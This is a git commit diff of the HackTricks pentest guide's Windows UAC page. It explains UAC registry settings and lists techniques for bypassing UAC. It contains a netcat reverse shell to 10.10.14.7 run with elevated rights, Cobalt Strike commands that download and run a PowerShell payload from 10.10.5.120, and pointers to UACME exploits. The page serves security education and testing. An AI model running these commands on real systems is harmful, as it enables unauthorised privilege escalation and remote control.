mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#3549] No subject
This commit is contained in:
parent
d2d1216657
commit
896002b372
1 changed files with 80 additions and 36 deletions
|
@ -86,14 +86,33 @@ Get Access Today:
|
|||
|
||||
## UAC
|
||||
|
||||
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
|
||||
[User Account Control (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) is a feature that enables a **consent prompt for elevated activities**. Applications have different `integrity` levels, and a program with a **high level** can perform tasks that **could potentially compromise the system**. When UAC is enabled, applications and tasks always **run under the security context of a non-administrator account** unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. It is a convenience feature that protects administrators from unintended changes but is not considered a security boundary.
|
||||
|
||||
To **differentiate** which process is executed with **low** or **high privileges** **Mandatory Integrity Controls** (MIC) are used. If you still don't know what are Windows Integrity levels check the following page:
|
||||
For more info about integrity levels:
|
||||
|
||||
{% content-ref url="windows-local-privilege-escalation/integrity-levels.md" %}
|
||||
[integrity-levels.md](windows-local-privilege-escalation/integrity-levels.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
When UAC is in place, an administrator user is given 2 tokens: a standard user key, to perform regular actions as regular level, and one with the admin privileges.
|
||||
|
||||
This [page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) discusses how UAC works in great depth and includes the logon process, user experience, and UAC architecture. Administrators can use security policies to configure how UAC works specific to their organization at the local level (using secpol.msc), or configured and pushed out via Group Policy Objects (GPO) in an Active Directory domain environment. The various settings are discussed in detail [here](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-security-policy-settings). There are 10 Group Policy settings that can be set for UAC. The following table provides additional detail:
|
||||
|
||||
| Group Policy Setting | Registry Key | Default Setting |
|
||||
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | --------------------------- | ------------------------------------------------------------ |
|
||||
| [User Account Control: Admin Approval Mode for the built-in Administrator account](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-admin-approval-mode-for-the-built-in-administrator-account) | FilterAdministratorToken | Disabled |
|
||||
| [User Account Control: Allow UIAccess applications to prompt for elevation without using the secure desktop](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-allow-uiaccess-applications-to-prompt-for-elevation-without-using-the-secure-desktop) | EnableUIADesktopToggle | Disabled |
|
||||
| [User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-administrators-in-admin-approval-mode) | ConsentPromptBehaviorAdmin | Prompt for consent for non-Windows binaries |
|
||||
| [User Account Control: Behavior of the elevation prompt for standard users](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-behavior-of-the-elevation-prompt-for-standard-users) | ConsentPromptBehaviorUser | Prompt for credentials on the secure desktop |
|
||||
| [User Account Control: Detect application installations and prompt for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-detect-application-installations-and-prompt-for-elevation) | EnableInstallerDetection | Enabled (default for home) Disabled (default for enterprise) |
|
||||
| [User Account Control: Only elevate executables that are signed and validated](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-executables-that-are-signed-and-validated) | ValidateAdminCodeSignatures | Disabled |
|
||||
| [User Account Control: Only elevate UIAccess applications that are installed in secure locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-only-elevate-uiaccess-applications-that-are-installed-in-secure-locations) | EnableSecureUIAPaths | Enabled |
|
||||
| [User Account Control: Run all administrators in Admin Approval Mode](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-run-all-administrators-in-admin-approval-mode) | EnableLUA | Enabled |
|
||||
| [User Account Control: Switch to the secure desktop when prompting for elevation](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-switch-to-the-secure-desktop-when-prompting-for-elevation) | PromptOnSecureDesktop | Enabled |
|
||||
| [User Account Control: Virtualize file and registry write failures to per-user locations](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings#user-account-control-virtualize-file-and-registry-write-failures-to-per-user-locations) | EnableVirtualization | <p></p><p>Enabled</p> |
|
||||
|
||||
### UAC Bypass Theory
|
||||
|
||||
Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary has to be **signed by Microsoft** also.
|
||||
|
||||
Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code** because it will be executed from a **High level integrity process**.
|
||||
|
@ -102,13 +121,25 @@ You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe*
|
|||
|
||||
### Check UAC
|
||||
|
||||
First you need to check the value of the key **EnableLUA**, if it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
|
||||
To confirm if UAC is enabled do:
|
||||
|
||||
```
|
||||
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
|
||||
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
|
||||
|
||||
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
|
||||
EnableLUA REG_DWORD 0x1
|
||||
```
|
||||
|
||||
Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
|
||||
If it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
|
||||
|
||||
Then, check **which level** is configured:
|
||||
|
||||
```
|
||||
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
|
||||
|
||||
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
|
||||
ConsentPromptBehaviorAdmin REG_DWORD 0x5
|
||||
```
|
||||
|
||||
* If **`0`** then, UAC won't prompt (like **disabled**)
|
||||
* If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
|
||||
|
@ -130,16 +161,7 @@ If **`0`**(default), the **built-in Administrator account can** do remote admini
|
|||
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
|
||||
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
|
||||
|
||||
### UAC bypass
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
|
||||
{% endhint %}
|
||||
|
||||
It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**
|
||||
|
||||
The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.\
|
||||
All this information can be gathered using the metasploit module: `post/windows/gather/win_privs`
|
||||
All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs`
|
||||
|
||||
You can also check the groups of your user and get the integrity level:
|
||||
|
||||
|
@ -148,7 +170,32 @@ net user %username%
|
|||
whoami /groups | findstr Level
|
||||
```
|
||||
|
||||
#### **Very** Basic UAC "bypass" (full file system access)
|
||||
## UAC bypass
|
||||
|
||||
{% hint style="info" %}
|
||||
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
|
||||
{% endhint %}
|
||||
|
||||
The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.
|
||||
|
||||
It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**
|
||||
|
||||
### UAC disabled
|
||||
|
||||
If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
|
||||
|
||||
```bash
|
||||
#Put your reverse shell instead of "calc.exe"
|
||||
Start-Process powershell -Verb runAs "calc.exe"
|
||||
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
|
||||
```
|
||||
|
||||
#### UAC bypass with token duplication
|
||||
|
||||
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
|
||||
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
|
||||
|
||||
### **Very** Basic UAC "bypass" (full file system access)
|
||||
|
||||
If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
|
||||
|
||||
|
@ -164,22 +211,7 @@ cd C$
|
|||
dir \\127.0.0.1\c$\Users\Administrator\Desktop
|
||||
```
|
||||
|
||||
#### UAC disabled
|
||||
|
||||
If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
|
||||
|
||||
```bash
|
||||
#Put your reverse shell instead of "calc.exe"
|
||||
Start-Process powershell -Verb runAs "calc.exe"
|
||||
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
|
||||
```
|
||||
|
||||
#### UAC bypass with token duplication
|
||||
|
||||
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
|
||||
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
|
||||
|
||||
#### UAC bypass with cobalt strike
|
||||
### UAC bypass with cobalt strike
|
||||
|
||||
The Cobalt Strike techniques will only work if UAC is not set at it's max security level
|
||||
|
||||
|
@ -195,12 +227,24 @@ runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-obj
|
|||
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
|
||||
```
|
||||
|
||||
#### UAC bypass exploits
|
||||
**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
|
||||
|
||||
You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like\_Source\Akagi\outout\x64\Debug\Akagi.exe\_) , you will need to know **which one you need.**\
|
||||
### UAC bypass exploits
|
||||
|
||||
[**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like `Source\Akagi\outout\x64\Debug\Akagi.exe`) , you will need to know **which one you need.**\
|
||||
You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
|
||||
|
||||
**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
|
||||
UACME has the **build version from which each technique started working**. You can search for a technique affecting your versions:
|
||||
|
||||
```
|
||||
PS C:\> [environment]::OSVersion.Version
|
||||
|
||||
Major Minor Build Revision
|
||||
----- ----- ----- --------
|
||||
10 0 14393 0
|
||||
```
|
||||
|
||||
Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) page you get the Windows release `1607` from the build versions.
|
||||
|
||||
#### More UAC bypass
|
||||
|
||||
|
@ -223,7 +267,7 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
|
|||
2. **IFileOperation**: Windows 10.
|
||||
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
|
||||
|
||||
#### Another UAC bypass technique
|
||||
### Another UAC bypass technique
|
||||
|
||||
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
|
||||
|
||||
|
|
Loading…
Reference in a new issue